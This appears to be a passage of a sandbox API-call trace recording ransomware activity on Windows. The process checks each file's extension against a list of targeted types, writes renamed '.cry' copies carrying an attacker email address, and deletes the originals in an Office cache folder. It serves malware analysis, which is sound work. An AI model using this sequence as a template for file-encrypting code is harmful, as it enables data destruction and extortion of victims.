[0044.620] SetFilePointerEx (in: hFile=0x1ec, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2b1fc7c | out: lpNewFilePointer=0x0) returned 1 [0044.620] WriteFile (in: hFile=0x1ec, lpBuffer=0x3fd40b0*, nNumberOfBytesToWrite=0x40000, lpNumberOfBytesWritten=0x2b1fc88, lpOverlapped=0x0 | out: lpBuffer=0x3fd40b0*, lpNumberOfBytesWritten=0x2b1fc88*=0x40000, lpOverlapped=0x0) returned 1 [0044.621] SetFilePointerEx (in: hFile=0x1ec, liDistanceToMove=0xcc6aa, lpNewFilePointer=0x0, dwMoveMethod=0x2b1fc7c | out: lpNewFilePointer=0x0) returned 1 [0044.621] WriteFile (in: hFile=0x1ec, lpBuffer=0x3fd40b0*, nNumberOfBytesToWrite=0x40000, lpNumberOfBytesWritten=0x2b1fc88, lpOverlapped=0x0 | out: lpBuffer=0x3fd40b0*, lpNumberOfBytesWritten=0x2b1fc88*=0x40000, lpOverlapped=0x0) returned 1 [0044.699] SetFilePointerEx (in: hFile=0x1ec, liDistanceToMove=0x225400, lpNewFilePointer=0x0, dwMoveMethod=0x2b1fc7c | out: lpNewFilePointer=0x0) returned 1 [0044.699] WriteFile (in: hFile=0x1ec, lpBuffer=0x3fd40b0*, nNumberOfBytesToWrite=0x40000, lpNumberOfBytesWritten=0x2b1fc88, lpOverlapped=0x0 | out: lpBuffer=0x3fd40b0*, lpNumberOfBytesWritten=0x2b1fc88*=0x40000, lpOverlapped=0x0) returned 1 [0044.702] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x3fd40b0 | out: hHeap=0x600000) returned 1 [0044.702] CloseHandle (hObject=0x1ec) returned 1 [0044.702] SetFileAttributesW (lpFileName="C:\\MSOCache\\All Users\\{90140000-00B4-0409-1000-0000000FF1CE}-C\\ProjectMUI.msi.id-9C354B42.[decryptoperator@qq.com].cry", dwFileAttributes=0x2020) returned 1 [0044.703] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-00B4-0409-1000-0000000FF1CE}-C\\ProjectMUI.msi") returned 77 [0044.703] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-00B4-0409-1000-0000000FF1CE}-C\\ProjectMUI.msi") returned 77 [0044.703] lstrlenW (lpString=".doc") returned 4 [0044.703] lstrcmpiW (lpString1=".doc", lpString2=".msi") returned -1 [0044.703] lstrlenW (lpString=".docx") returned 5 [0044.703] lstrcmpiW (lpString1=".docx", lpString2="I.msi") returned -1 [0044.703] lstrlenW (lpString=".pdf") returned 4 [0044.703] lstrcmpiW (lpString1=".pdf", lpString2=".msi") returned 1 [0044.703] lstrlenW (lpString=".xls") returned 4 [0044.703] lstrcmpiW (lpString1=".xls", lpString2=".msi") returned 1 [0044.703] lstrlenW (lpString=".xlsx") returned 5 [0044.703] lstrcmpiW (lpString1=".xlsx", lpString2="I.msi") returned -1 [0044.703] lstrlenW (lpString=".ppt") returned 4 [0044.703] lstrcmpiW (lpString1=".ppt", lpString2=".msi") returned 1 [0044.703] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-00B4-0409-1000-0000000FF1CE}-C\\ProjectMUI.msi") returned 77 [0044.703] lstrlenW (lpString=".zip") returned 4 [0044.703] lstrcmpiW (lpString1=".zip", lpString2=".msi") returned 1 [0044.703] lstrlenW (lpString=".rar") returned 4 [0044.703] lstrcmpiW (lpString1=".rar", lpString2=".msi") returned 1 [0044.703] lstrlenW (lpString=".bz2") returned 4 [0044.703] lstrcmpiW (lpString1=".bz2", lpString2=".msi") returned -1 [0044.703] lstrlenW (lpString=".7z") returned 3 [0044.703] lstrcmpiW (lpString1=".7z", lpString2="msi") returned -1 [0044.703] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-00B4-0409-1000-0000000FF1CE}-C\\ProjectMUI.msi") returned 77 [0044.703] lstrlenW (lpString=".dbf") returned 4 [0044.703] lstrcmpiW (lpString1=".dbf", lpString2=".msi") returned -1 [0044.703] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-00B4-0409-1000-0000000FF1CE}-C\\ProjectMUI.msi") returned 77 [0044.703] lstrlenW (lpString=".1cd") returned 4 [0044.703] lstrcmpiW (lpString1=".1cd", lpString2=".msi") returned -1 [0044.703] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-00B4-0409-1000-0000000FF1CE}-C\\ProjectMUI.msi") returned 77 [0044.703] lstrlenW (lpString=".jpg") returned 4 [0044.703] lstrcmpiW (lpString1=".jpg", lpString2=".msi") returned -1 [0044.703] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-00B4-0409-1000-0000000FF1CE}-C\\ProjectMUI.msi") returned 77 [0044.703] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-00B4-0409-1000-0000000FF1CE}-C\\ProjectMUI.msi") returned 77 [0044.703] lstrlenW (lpString=".doc") returned 4 [0044.703] lstrcmpiW (lpString1=".doc", lpString2=".msi") returned -1 [0044.703] lstrlenW (lpString=".docx") returned 5 [0044.703] lstrcmpiW (lpString1=".docx", lpString2="I.msi") returned -1 [0044.704] lstrlenW (lpString=".pdf") returned 4 [0044.704] lstrcmpiW (lpString1=".pdf", lpString2=".msi") returned 1 [0044.704] lstrlenW (lpString=".xls") returned 4 [0044.704] lstrcmpiW (lpString1=".xls", lpString2=".msi") returned 1 [0044.704] lstrlenW (lpString=".xlsx") returned 5 [0044.704] lstrcmpiW (lpString1=".xlsx", lpString2="I.msi") returned -1 [0044.704] lstrlenW (lpString=".ppt") returned 4 [0044.704] lstrcmpiW (lpString1=".ppt", lpString2=".msi") returned 1 [0044.704] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-00B4-0409-1000-0000000FF1CE}-C\\ProjectMUI.msi") returned 77 [0044.704] lstrlenW (lpString=".zip") returned 4 [0044.704] lstrcmpiW (lpString1=".zip", lpString2=".msi") returned 1 [0044.704] lstrlenW (lpString=".rar") returned 4 [0044.704] lstrcmpiW (lpString1=".rar", lpString2=".msi") returned 1 [0044.704] lstrlenW (lpString=".bz2") returned 4 [0044.704] lstrcmpiW (lpString1=".bz2", lpString2=".msi") returned -1 [0044.704] lstrlenW (lpString=".7z") returned 3 [0044.704] lstrcmpiW (lpString1=".7z", lpString2="msi") returned -1 [0044.704] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-00B4-0409-1000-0000000FF1CE}-C\\ProjectMUI.msi") returned 77 [0044.704] lstrlenW (lpString=".dbf") returned 4 [0044.704] lstrcmpiW (lpString1=".dbf", lpString2=".msi") returned -1 [0044.704] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-00B4-0409-1000-0000000FF1CE}-C\\ProjectMUI.msi") returned 77 [0044.704] lstrlenW (lpString=".1cd") returned 4 [0044.704] lstrcmpiW (lpString1=".1cd", lpString2=".msi") returned -1 [0044.704] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-00B4-0409-1000-0000000FF1CE}-C\\ProjectMUI.msi") returned 77 [0044.704] lstrlenW (lpString=".jpg") returned 4 [0044.704] lstrcmpiW (lpString1=".jpg", lpString2=".msi") returned -1 [0044.704] lstrcmpiW (lpString1=".EXE", lpString2=".cry") returned 1 [0044.704] lstrlenW (lpString="DW20.EXE") returned 8 [0044.704] CreateFileW (lpFileName="C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\DW20.EXE" (normalized: "c:\\msocache\\all users\\{90140000-0115-0409-1000-0000000ff1ce}-c\\dw20.exe"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x184 [0045.753] GetFileSizeEx (in: hFile=0x184, lpFileSize=0x2b1ff1c | out: lpFileSize=0x2b1ff1c*=838536) returned 1 [0045.753] CloseHandle (hObject=0x184) returned 1 [0045.753] GetFileAttributesW (lpFileName="C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\DW20.EXE" (normalized: "c:\\msocache\\all users\\{90140000-0115-0409-1000-0000000ff1ce}-c\\dw20.exe")) returned 0x2020 [0045.753] GetFileAttributesW (lpFileName="C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\DW20.EXE.id-9C354B42.[decryptoperator@qq.com].cry" (normalized: "c:\\msocache\\all users\\{90140000-0115-0409-1000-0000000ff1ce}-c\\dw20.exe.id-9c354b42.[decryptoperator@qq.com].cry")) returned 0xffffffff [0045.753] CreateFileW (lpFileName="C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\DW20.EXE" (normalized: "c:\\msocache\\all users\\{90140000-0115-0409-1000-0000000ff1ce}-c\\dw20.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x184 [0045.753] SetFilePointerEx (in: hFile=0x184, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2b1fec8 | out: lpNewFilePointer=0x0) returned 1 [0045.753] SetFilePointerEx (in: hFile=0x184, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2b1fec8 | out: lpNewFilePointer=0x0) returned 1 [0045.753] CreateFileW (lpFileName="C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\DW20.EXE.id-9C354B42.[decryptoperator@qq.com].cry" (normalized: "c:\\msocache\\all users\\{90140000-0115-0409-1000-0000000ff1ce}-c\\dw20.exe.id-9c354b42.[decryptoperator@qq.com].cry"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x16c [0045.754] GetLastError () returned 0x0 [0045.754] ReadFile (in: hFile=0x184, lpBuffer=0x3630020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2b1fed4, lpOverlapped=0x0 | out: lpBuffer=0x3630020*, lpNumberOfBytesRead=0x2b1fed4*=0xccb88, lpOverlapped=0x0) returned 1 [0046.377] WriteFile (in: hFile=0x16c, lpBuffer=0x3630020*, nNumberOfBytesToWrite=0xccb90, lpNumberOfBytesWritten=0x2b1fc9c, lpOverlapped=0x0 | out: lpBuffer=0x3630020*, lpNumberOfBytesWritten=0x2b1fc9c*=0xccb90, lpOverlapped=0x0) returned 1 [0046.391] ReadFile (in: hFile=0x184, lpBuffer=0x3630020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2b1fed4, lpOverlapped=0x0 | out: lpBuffer=0x3630020*, lpNumberOfBytesRead=0x2b1fed4*=0x0, lpOverlapped=0x0) returned 1 [0046.391] WriteFile (in: hFile=0x16c, lpBuffer=0x3630020*, nNumberOfBytesToWrite=0xe4, lpNumberOfBytesWritten=0x2b1fc9c, lpOverlapped=0x0 | out: lpBuffer=0x3630020*, lpNumberOfBytesWritten=0x2b1fc9c*=0xe4, lpOverlapped=0x0) returned 1 [0046.392] SetEndOfFile (hFile=0x16c) returned 1 [0046.392] CloseHandle (hObject=0x16c) returned 1 [0046.392] SetFilePointerEx (in: hFile=0x184, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2b1fec8 | out: lpNewFilePointer=0x0) returned 1 [0046.392] SetEndOfFile (hFile=0x184) returned 1 [0046.398] CloseHandle (hObject=0x184) returned 1 [0046.398] SetFileAttributesW (lpFileName="C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\DW20.EXE.id-9C354B42.[decryptoperator@qq.com].cry", dwFileAttributes=0x2020) returned 1 [0046.398] DeleteFileW (lpFileName="C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\DW20.EXE" (normalized: "c:\\msocache\\all users\\{90140000-0115-0409-1000-0000000ff1ce}-c\\dw20.exe")) returned 1 [0046.398] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\DW20.EXE") returned 71 [0046.398] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\DW20.EXE") returned 71 [0046.398] lstrlenW (lpString=".doc") returned 4 [0046.398] lstrcmpiW (lpString1=".doc", lpString2=".EXE") returned -1 [0046.399] lstrlenW (lpString=".docx") returned 5 [0046.399] lstrcmpiW (lpString1=".docx", lpString2="0.EXE") returned -1 [0046.399] lstrlenW (lpString=".pdf") returned 4 [0046.399] lstrcmpiW (lpString1=".pdf", lpString2=".EXE") returned 1 [0046.399] lstrlenW (lpString=".xls") returned 4 [0046.399] lstrcmpiW (lpString1=".xls", lpString2=".EXE") returned 1 [0046.399] lstrlenW (lpString=".xlsx") returned 5 [0046.399] lstrcmpiW (lpString1=".xlsx", lpString2="0.EXE") returned -1 [0046.399] lstrlenW (lpString=".ppt") returned 4 [0046.399] lstrcmpiW (lpString1=".ppt", lpString2=".EXE") returned 1 [0046.399] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\DW20.EXE") returned 71 [0046.399] lstrlenW (lpString=".zip") returned 4 [0046.399] lstrcmpiW (lpString1=".zip", lpString2=".EXE") returned 1 [0046.399] lstrlenW (lpString=".rar") returned 4 [0046.399] lstrcmpiW (lpString1=".rar", lpString2=".EXE") returned 1 [0046.399] lstrlenW (lpString=".bz2") returned 4 [0046.399] lstrcmpiW (lpString1=".bz2", lpString2=".EXE") returned -1 [0046.399] lstrlenW (lpString=".7z") returned 3 [0046.399] lstrcmpiW (lpString1=".7z", lpString2="EXE") returned -1 [0046.399] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\DW20.EXE") returned 71 [0046.399] lstrlenW (lpString=".dbf") returned 4 [0046.399] lstrcmpiW (lpString1=".dbf", lpString2=".EXE") returned -1 [0046.399] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\DW20.EXE") returned 71 [0046.399] lstrlenW (lpString=".1cd") returned 4 [0046.399] lstrcmpiW (lpString1=".1cd", lpString2=".EXE") returned -1 [0046.399] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\DW20.EXE") returned 71 [0046.399] lstrlenW (lpString=".jpg") returned 4 [0046.399] lstrcmpiW (lpString1=".jpg", lpString2=".EXE") returned 1 [0046.399] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\DW20.EXE") returned 71 [0046.399] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\DW20.EXE") returned 71 [0046.399] lstrlenW (lpString=".doc") returned 4 [0046.399] lstrcmpiW (lpString1=".doc", lpString2=".EXE") returned -1 [0046.399] lstrlenW (lpString=".docx") returned 5 [0046.399] lstrcmpiW (lpString1=".docx", lpString2="0.EXE") returned -1 [0046.399] lstrlenW (lpString=".pdf") returned 4 [0046.399] lstrcmpiW (lpString1=".pdf", lpString2=".EXE") returned 1 [0046.399] lstrlenW (lpString=".xls") returned 4 [0046.399] lstrcmpiW (lpString1=".xls", lpString2=".EXE") returned 1 [0046.400] lstrlenW (lpString=".xlsx") returned 5 [0046.400] lstrcmpiW (lpString1=".xlsx", lpString2="0.EXE") returned -1 [0046.400] lstrlenW (lpString=".ppt") returned 4 [0046.400] lstrcmpiW (lpString1=".ppt", lpString2=".EXE") returned 1 [0046.400] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\DW20.EXE") returned 71 [0046.400] lstrlenW (lpString=".zip") returned 4 [0046.400] lstrcmpiW (lpString1=".zip", lpString2=".EXE") returned 1 [0046.400] lstrlenW (lpString=".rar") returned 4 [0046.400] lstrcmpiW (lpString1=".rar", lpString2=".EXE") returned 1 [0046.400] lstrlenW (lpString=".bz2") returned 4 [0046.400] lstrcmpiW (lpString1=".bz2", lpString2=".EXE") returned -1 [0046.400] lstrlenW (lpString=".7z") returned 3 [0046.400] lstrcmpiW (lpString1=".7z", lpString2="EXE") returned -1 [0046.400] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\DW20.EXE") returned 71 [0046.400] lstrlenW (lpString=".dbf") returned 4 [0046.400] lstrcmpiW (lpString1=".dbf", lpString2=".EXE") returned -1 [0046.400] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\DW20.EXE") returned 71 [0046.400] lstrlenW (lpString=".1cd") returned 4 [0046.400] lstrcmpiW (lpString1=".1cd", lpString2=".EXE") returned -1 [0046.400] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\DW20.EXE") returned 71 [0046.400] lstrlenW (lpString=".jpg") returned 4 [0046.400] lstrcmpiW (lpString1=".jpg", lpString2=".EXE") returned 1 [0046.400] lstrcmpiW (lpString1=".manifest", lpString2=".cry") returned 1 [0046.400] lstrlenW (lpString="Microsoft.VC90.CRT.manifest") returned 27 [0046.400] CreateFileW (lpFileName="C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\Microsoft.VC90.CRT.manifest" (normalized: "c:\\msocache\\all users\\{90140000-0115-0409-1000-0000000ff1ce}-c\\microsoft.vc90.crt.manifest"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x184 [0046.401] GetFileSizeEx (in: hFile=0x184, lpFileSize=0x2b1ff1c | out: lpFileSize=0x2b1ff1c*=1857) returned 1 [0046.401] CloseHandle (hObject=0x184) returned 1 [0046.401] GetFileAttributesW (lpFileName="C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\Microsoft.VC90.CRT.manifest" (normalized: "c:\\msocache\\all users\\{90140000-0115-0409-1000-0000000ff1ce}-c\\microsoft.vc90.crt.manifest")) returned 0x2020 [0046.401] GetFileAttributesW (lpFileName="C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\Microsoft.VC90.CRT.manifest.id-9C354B42.[decryptoperator@qq.com].cry" (normalized: "c:\\msocache\\all users\\{90140000-0115-0409-1000-0000000ff1ce}-c\\microsoft.vc90.crt.manifest.id-9c354b42.[decryptoperator@qq.com].cry")) returned 0xffffffff [0046.401] CreateFileW (lpFileName="C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\Microsoft.VC90.CRT.manifest" (normalized: "c:\\msocache\\all users\\{90140000-0115-0409-1000-0000000ff1ce}-c\\microsoft.vc90.crt.manifest"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x184 [0046.401] SetFilePointerEx (in: hFile=0x184, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2b1fec8 | out: lpNewFilePointer=0x0) returned 1 [0046.401] SetFilePointerEx (in: hFile=0x184, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2b1fec8 | out: lpNewFilePointer=0x0) returned 1 [0046.401] CreateFileW (lpFileName="C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\Microsoft.VC90.CRT.manifest.id-9C354B42.[decryptoperator@qq.com].cry" (normalized: "c:\\msocache\\all users\\{90140000-0115-0409-1000-0000000ff1ce}-c\\microsoft.vc90.crt.manifest.id-9c354b42.[decryptoperator@qq.com].cry"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x16c [0046.401] GetLastError () returned 0x0 [0046.401] ReadFile (in: hFile=0x184, lpBuffer=0x3630020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2b1fed4, lpOverlapped=0x0 | out: lpBuffer=0x3630020*, lpNumberOfBytesRead=0x2b1fed4*=0x741, lpOverlapped=0x0) returned 1 [0046.528] WriteFile (in: hFile=0x16c, lpBuffer=0x3630020*, nNumberOfBytesToWrite=0x750, lpNumberOfBytesWritten=0x2b1fc9c, lpOverlapped=0x0 | out: lpBuffer=0x3630020*, lpNumberOfBytesWritten=0x2b1fc9c*=0x750, lpOverlapped=0x0) returned 1 [0046.529] ReadFile (in: hFile=0x184, lpBuffer=0x3630020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2b1fed4, lpOverlapped=0x0 | out: lpBuffer=0x3630020*, lpNumberOfBytesRead=0x2b1fed4*=0x0, lpOverlapped=0x0) returned 1 [0046.529] WriteFile (in: hFile=0x16c, lpBuffer=0x3630020*, nNumberOfBytesToWrite=0x10a, lpNumberOfBytesWritten=0x2b1fc9c, lpOverlapped=0x0 | out: lpBuffer=0x3630020*, lpNumberOfBytesWritten=0x2b1fc9c*=0x10a, lpOverlapped=0x0) returned 1 [0046.529] SetEndOfFile (hFile=0x16c) returned 1 [0046.530] CloseHandle (hObject=0x16c) returned 1 [0046.530] SetFilePointerEx (in: hFile=0x184, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2b1fec8 | out: lpNewFilePointer=0x0) returned 1 [0046.530] SetEndOfFile (hFile=0x184) returned 1 [0046.530] CloseHandle (hObject=0x184) returned 1 [0046.531] SetFileAttributesW (lpFileName="C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\Microsoft.VC90.CRT.manifest.id-9C354B42.[decryptoperator@qq.com].cry", dwFileAttributes=0x2020) returned 1 [0046.531] DeleteFileW (lpFileName="C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\Microsoft.VC90.CRT.manifest" (normalized: "c:\\msocache\\all users\\{90140000-0115-0409-1000-0000000ff1ce}-c\\microsoft.vc90.crt.manifest")) returned 1 [0046.531] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\Microsoft.VC90.CRT.manifest") returned 90 [0046.531] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\Microsoft.VC90.CRT.manifest") returned 90 [0046.531] lstrlenW (lpString=".doc") returned 4 [0046.531] lstrcmpiW (lpString1=".doc", lpString2="fest") returned -1 [0046.531] lstrlenW (lpString=".docx") returned 5 [0046.531] lstrcmpiW (lpString1=".docx", lpString2="ifest") returned -1 [0046.531] lstrlenW (lpString=".pdf") returned 4 [0046.531] lstrcmpiW (lpString1=".pdf", lpString2="fest") returned -1 [0046.531] lstrlenW (lpString=".xls") returned 4 [0046.531] lstrcmpiW (lpString1=".xls", lpString2="fest") returned -1 [0046.531] lstrlenW (lpString=".xlsx") returned 5 [0046.531] lstrcmpiW (lpString1=".xlsx", lpString2="ifest") returned -1 [0046.531] lstrlenW (lpString=".ppt") returned 4 [0046.531] lstrcmpiW (lpString1=".ppt", lpString2="fest") returned -1 [0046.531] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\Microsoft.VC90.CRT.manifest") returned 90 [0046.531] lstrlenW (lpString=".zip") returned 4 [0046.531] lstrcmpiW (lpString1=".zip", lpString2="fest") returned -1 [0046.531] lstrlenW (lpString=".rar") returned 4 [0046.531] lstrcmpiW (lpString1=".rar", lpString2="fest") returned -1 [0046.531] lstrlenW (lpString=".bz2") returned 4 [0046.531] lstrcmpiW (lpString1=".bz2", lpString2="fest") returned -1 [0046.532] lstrlenW (lpString=".7z") returned 3 [0046.532] lstrcmpiW (lpString1=".7z", lpString2="est") returned -1 [0046.532] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\Microsoft.VC90.CRT.manifest") returned 90 [0046.532] lstrlenW (lpString=".dbf") returned 4 [0046.532] lstrcmpiW (lpString1=".dbf", lpString2="fest") returned -1 [0046.532] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\Microsoft.VC90.CRT.manifest") returned 90 [0046.532] lstrlenW (lpString=".1cd") returned 4 [0046.532] lstrcmpiW (lpString1=".1cd", lpString2="fest") returned -1 [0046.532] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\Microsoft.VC90.CRT.manifest") returned 90 [0046.532] lstrlenW (lpString=".jpg") returned 4 [0046.532] lstrcmpiW (lpString1=".jpg", lpString2="fest") returned -1 [0046.532] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\Microsoft.VC90.CRT.manifest") returned 90 [0046.532] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\Microsoft.VC90.CRT.manifest") returned 90 [0046.532] lstrlenW (lpString=".doc") returned 4 [0046.532] lstrcmpiW (lpString1=".doc", lpString2="fest") returned -1 [0046.532] lstrlenW (lpString=".docx") returned 5 [0046.532] lstrcmpiW (lpString1=".docx", lpString2="ifest") returned -1 [0046.532] lstrlenW (lpString=".pdf") returned 4 [0046.532] lstrcmpiW (lpString1=".pdf", lpString2="fest") returned -1 [0046.532] lstrlenW (lpString=".xls") returned 4 [0046.532] lstrcmpiW (lpString1=".xls", lpString2="fest") returned -1 [0046.532] lstrlenW (lpString=".xlsx") returned 5 [0046.532] lstrcmpiW (lpString1=".xlsx", lpString2="ifest") returned -1 [0046.532] lstrlenW (lpString=".ppt") returned 4 [0046.532] lstrcmpiW (lpString1=".ppt", lpString2="fest") returned -1 [0046.532] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\Microsoft.VC90.CRT.manifest") returned 90 [0046.532] lstrlenW (lpString=".zip") returned 4 [0046.532] lstrcmpiW (lpString1=".zip", lpString2="fest") returned -1 [0046.532] lstrlenW (lpString=".rar") returned 4 [0046.533] lstrcmpiW (lpString1=".rar", lpString2="fest") returned -1 [0046.533] lstrlenW (lpString=".bz2") returned 4 [0046.533] lstrcmpiW (lpString1=".bz2", lpString2="fest") returned -1 [0046.533] lstrlenW (lpString=".7z") returned 3 [0046.533] lstrcmpiW (lpString1=".7z", lpString2="est") returned -1 [0046.533] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\Microsoft.VC90.CRT.manifest") returned 90 [0046.533] lstrlenW (lpString=".dbf") returned 4 [0046.533] lstrcmpiW (lpString1=".dbf", lpString2="fest") returned -1 [0046.533] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\Microsoft.VC90.CRT.manifest") returned 90 [0046.533] lstrlenW (lpString=".1cd") returned 4 [0046.533] lstrcmpiW (lpString1=".1cd", lpString2="fest") returned -1 [0046.533] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\Microsoft.VC90.CRT.manifest") returned 90 [0046.533] lstrlenW (lpString=".jpg") returned 4 [0046.533] lstrcmpiW (lpString1=".jpg", lpString2="fest") returned -1 [0046.533] lstrcmpiW (lpString1=".dll", lpString2=".cry") returned 1 [0046.533] lstrlenW (lpString="msvcr90.dll") returned 11 [0046.533] CreateFileW (lpFileName="C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\msvcr90.dll" (normalized: "c:\\msocache\\all users\\{90140000-0115-0409-1000-0000000ff1ce}-c\\msvcr90.dll"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x184 [0046.533] GetFileSizeEx (in: hFile=0x184, lpFileSize=0x2b1ff1c | out: lpFileSize=0x2b1ff1c*=655872) returned 1 [0046.533] CloseHandle (hObject=0x184) returned 1 [0046.533] GetFileAttributesW (lpFileName="C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\msvcr90.dll" (normalized: "c:\\msocache\\all users\\{90140000-0115-0409-1000-0000000ff1ce}-c\\msvcr90.dll")) returned 0x2020 [0046.533] GetFileAttributesW (lpFileName="C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\msvcr90.dll.id-9C354B42.[decryptoperator@qq.com].cry" (normalized: "c:\\msocache\\all users\\{90140000-0115-0409-1000-0000000ff1ce}-c\\msvcr90.dll.id-9c354b42.[decryptoperator@qq.com].cry")) returned 0xffffffff [0046.534] CreateFileW (lpFileName="C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\msvcr90.dll" (normalized: "c:\\msocache\\all users\\{90140000-0115-0409-1000-0000000ff1ce}-c\\msvcr90.dll"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x184 [0046.534] SetFilePointerEx (in: hFile=0x184, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2b1fec8 | out: lpNewFilePointer=0x0) returned 1 [0046.534] SetFilePointerEx (in: hFile=0x184, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2b1fec8 